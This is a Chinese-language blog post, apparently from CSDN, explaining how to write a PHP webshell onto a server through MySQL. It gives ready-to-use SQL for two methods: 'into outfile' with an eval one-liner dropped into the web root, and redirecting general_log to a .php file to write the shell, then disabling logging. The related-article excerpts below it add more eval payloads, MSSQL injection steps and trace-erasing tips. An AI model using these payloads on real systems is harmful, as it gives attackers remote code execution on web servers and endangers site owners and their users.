MySQL数据库上传webshell的方法

最新推荐文章于 2022-08-25 20:28:33 发布
最新推荐文章于 2022-08-25 20:28:33 发布
阅读量750 收藏 2
点赞数
分类专栏: MySQL上传shell 文章标签: 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42373409/article/details/108594618
版权

1.into outfile方法

在mysql.ini配置文件中参数secure_file_priv的取值决定了写入开关的状态;
(1)secure_file_priv=NULL;–>表示写入开关关闭;
(2)secure_file_priv=“”;–>表示写入开关打开;
(3)secure_file_priv=“web路径”;–>表示写入开关打开,并写入指定路径下,如果写入路径不是web路径,则无法通过此种方法写入webshell。
修改该参数只能通过修改mysql.ini完成,命令行无法完成。
上传的sql语句

select "<?php @eval($_POST['hack']);?>" into outfile "C://phpstudy//PHPTutorial//WWW//shell.php"

后续利用菜刀进行连接;

2.general_log日志写入

该方法的原理是通过打开日志功能,将日志文件路径设为shell上传的路径;然后向shell文件中写入shell语句;
具体sql语句

show variables like '%general%'; #查看配置
set global general_log = on;	#打开日志写入功能
set global general_log_file = 'c://phpstudy//PHPTutorial/WWW/shell.php';
select '<?php @eval($_GET[hack]);?>';
set global general_log = off;

3.数据库备份的方式

(需要借助相应web研究)

huihui_zyh
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
数据库备份批量拿站的WEBSHELL
07-15
数据库备份批量拿站的WEBSHELL数据库备份批量拿站的WEBSHELL数据库备份批量拿站的WEBSHELL数据库备份批量拿站的WEBSHELL
【getshellMySQL上传webshell
ssrf
10-20 774
文章目录一、select into outfile直接写入1、利用条件2、查看secure_file_priv值3、写入一句话二、利用全局日志写shell1、查看配置2、开启general_log模式3、修改日志目录为shell地址4、写入shell5、抹除痕迹 一、select into outfile直接写入 1、利用条件 对web目录需要有写权限能够使用单引号(root) 知道网站绝对路径(phpinfo/php探针/通过报错等) secure_file_priv没有具体值 2、查看secur
Mysql写入webshell两种方法总结-- into outfile,导入日志
qq_45730325的博客
05-19 3498
Mysql写入webshell
如何向mysql写入wbeshell
ws1813004226的博客
03-23 824
如何向mysql写入wbeshell 一、成功写入wbeshell必须满足的4个条件: (1)数据库拥有root权限或拥有file权限。 (2)知道网站的绝对路径。 (3)PHP的GPC参数为OFF状态。 (4)MYSQL中的secure_file_priv参数不能为NULL。 二、写入方法 1.使用outfile方法。outfile是mysql提供的一个用来写入文件的函数,当我们可以控制写入文件的内容以及文件的保存路径时,我们就可以上传一个webshell。 2.基于日志写入法。将日志文件的导出目录修改成
MSSQL注入之木马上传webshell
Jim的博客
08-16 4363
1.检测是否存在注入点:依次添加语句',and 1=1和and 1=2,来判断网站是否存在注入点 2.利用语句:a' having 1=1--爆出表名和字段名AdminUser.AdminId 3.接着爆出其他字段: a' group by adminuser.adminid having 1=1--  //爆出用户名字段 a' group by adminuser.adminid,adm
复现mysql 备份上传木马,并用shell工具连接操作
weixin_64655821的博客
08-25 321
复现mysql 备份上传木马,并用shell工具连接操作
MySQL数据库渗透及漏洞利用总结
02-25
各种Mysql注入,Mysql提权,Mysql数据库root账号webshell获取等的,但没有一个对Mysql数据库渗透较为全面对总结,针对这种情况我们开展了研究,虽然我们团队今年正在出版《网络攻防实战研究——漏洞利用与提权》,但...
MySql备份得到WebShell.pdf
10-10
MySql备份得到WebShell.pdf
窃密型WebShell检测方法
01-30
黑客在利用WEB应用漏洞攻击成功后,通常会利用植入Webshell后门实现对应用系统篡改、对操作系统控制以及对数据库中敏感数据的窃取。攻击者通过浏览器或者控制端与被控制的WEB应用系统之间通过开启
MSSQL 2005 LOG备份webshell方法
12-15
注:转载就注入出自’孤孤浪子博客’原创 http://itpro.blog.163.com 第一步 http://itpro.blog.163.com/test.asp’;...declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/...
MYSQL注入|文件读写|获取敏感信息|上传getshell|绕过宽字节、magic_quotes_gpc
BING
04-09 3893
文章目录1.SQL注入的思维导图2.MYSQL注入思维导图3.文件读写获取路径常见方法(1).报错显示(2).遗留文件(3).漏洞报错(4).平台配置文件(5). 爆破文件读写函数(1)load_file():读取函数(2)into outfile或iinto dumpfile:导出函数写入WebShell的几种方式 1.SQL注入的思维导图 2.MYSQL注入思维导图 3.文件读写 文件读写操作: load_file():读取函数 into outfile或iinto dumpfile:导出函数 会用
通过MySQL写入webshell的几种方式(小宇特详解)
小宇的web博客
08-07 4800
通过MySQL写入webshell的几种方式 -01-通过outfile写入shell 利用条件 1.root权限2.网站的绝对路径且具有写入权限,能够使用into outfile和into dumpfile来进行写入。 这里用了以下的shell union select 1,"<?php eval($_REQUEST[8])?>" into outfile 'C:/phpStudy/WWW/4448.php' 这里连接蚁剑 -02-将shell写入表中 利用条件 1.root权限2.网站
Webshell上传方式
悦分享
07-31 3664
某天公司的网络运维人员发现公司的业务系统遭到了攻击,被挂了木马,导致公司数据泄露,并且黑客留下了后门。Webshell,顾名思义web指的是在web服务器上,而shell是用脚本语言编写的脚本程序Webshell就是就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,可以对web服务器进行操作的权限,也可以将其称做为一种网页后门。............
数据库上传WebShell的三种方式
m0_48520508的博客
08-08 3406
一、什么是WebShell? 简单的说来,webshell就是一个asp或php木马后门,黑客在入侵了一个网站后,常常在将这些asp或php木马后门文件放置在网站服务器的web目录中,与正常的网页文件混在一起。然后黑客就可以用web的方式,通过asp或php木马后门控制网站服务器,包括上传下载文件、查看数据库、执行任意程序命令等。 为了更好理解WebShell我们学习两个概念: 什么是“木马”? “木马”全称是“特洛伊木马(Trojan Horse)”,原指古希腊士兵藏在木马内进入敌方城市从而占领敌方城市.
mysql数据写入突然慢了_通过MySQL写入webshell的几种方式
weixin_39648824的博客
11-28 287
当我们通过测试发现SQL注入,或拿到像phpMyAdmin之类的web数据库可视化管理工具,并想要进行下一步渗透的时候,可通过数据库写入webshell到目标服务器上,利用webshell管理工具控制目标服务器。下面将讲述几个通过MySQL数据库写入webshell方法,以拿到phpMyAdmin为例。-01-通过outfile写入shell利用条件:1、root权限2、网站的绝对路径...
MySQL注入之木马上传webshell
Jim的博客
08-15 1万+
原理:利用MySQL中的写命令into outfile(固定式:select A into outfile B),在目标Web虚拟路径D:/WWW/下面生成一个木马文件  工具:中国菜刀 1.首先查找SQL注入点 使用单引号'报错,使用and 1=1页面正常和and 1=2页面不正常,来判断存在SQL注入 2.使用order by猜测字段数量 ?id=1+order+by+2--+
MySQL注入点写入WebShell的几种方式
热门推荐
04-16 2万+
在工具化日益成熟的今天,手工注入的能力越来越被忽视了。当你掌握了一款工具的使用时,应更深入的去了解工具帮你做了什么,把工具所产生的影响控制在自己可控的范围内。比如:当面对一个MySQL注...
利用mysql的弱密码漏洞上传web shell
biziwaiwai的博客
02-13 4473
一、      1.什么是MySQLMysql是最好的关系型数据库管理系统,是最流行的关系型数据库管理系统之一,在web应用方面mysql是最好的RDBMS应用软件2.Mysql弱密码漏洞由于mysql   root账户的password设置简单,很容易被爆破成功,从而很容易被入侵者获得密码,并获得高权限二、      1.漏洞原理Mysql的root账户的密码过于简单,复杂度不够,很容易被破解2...
浅谈MySQL导出一句话木马拿WebShell方法-只需要一句SQL
gscaiyucheng的专栏
02-28 9952
昨天看一篇文章中说到MySQL导出一句话木马拿WebShell方法。   文章中用到的SQL语句大体如下(命令行或者其它能执行SQL命令的shell都行):   Drop TABLE IF EXISTS temp; //如果存在temp就删掉   Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段   Insert INT
mysql数据库密码加密
最新发布
07-25
在实际攻防过程中,如果能够获取到Webshell,可以直接下载MYSQL数据库中的user.MYD文件。该文件中保存了MYSQL数据库中所有用户对应的密码。只要能够破解这些密码,就可以正常操作这些数据。\[2\] 研究MYSQL数据库的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值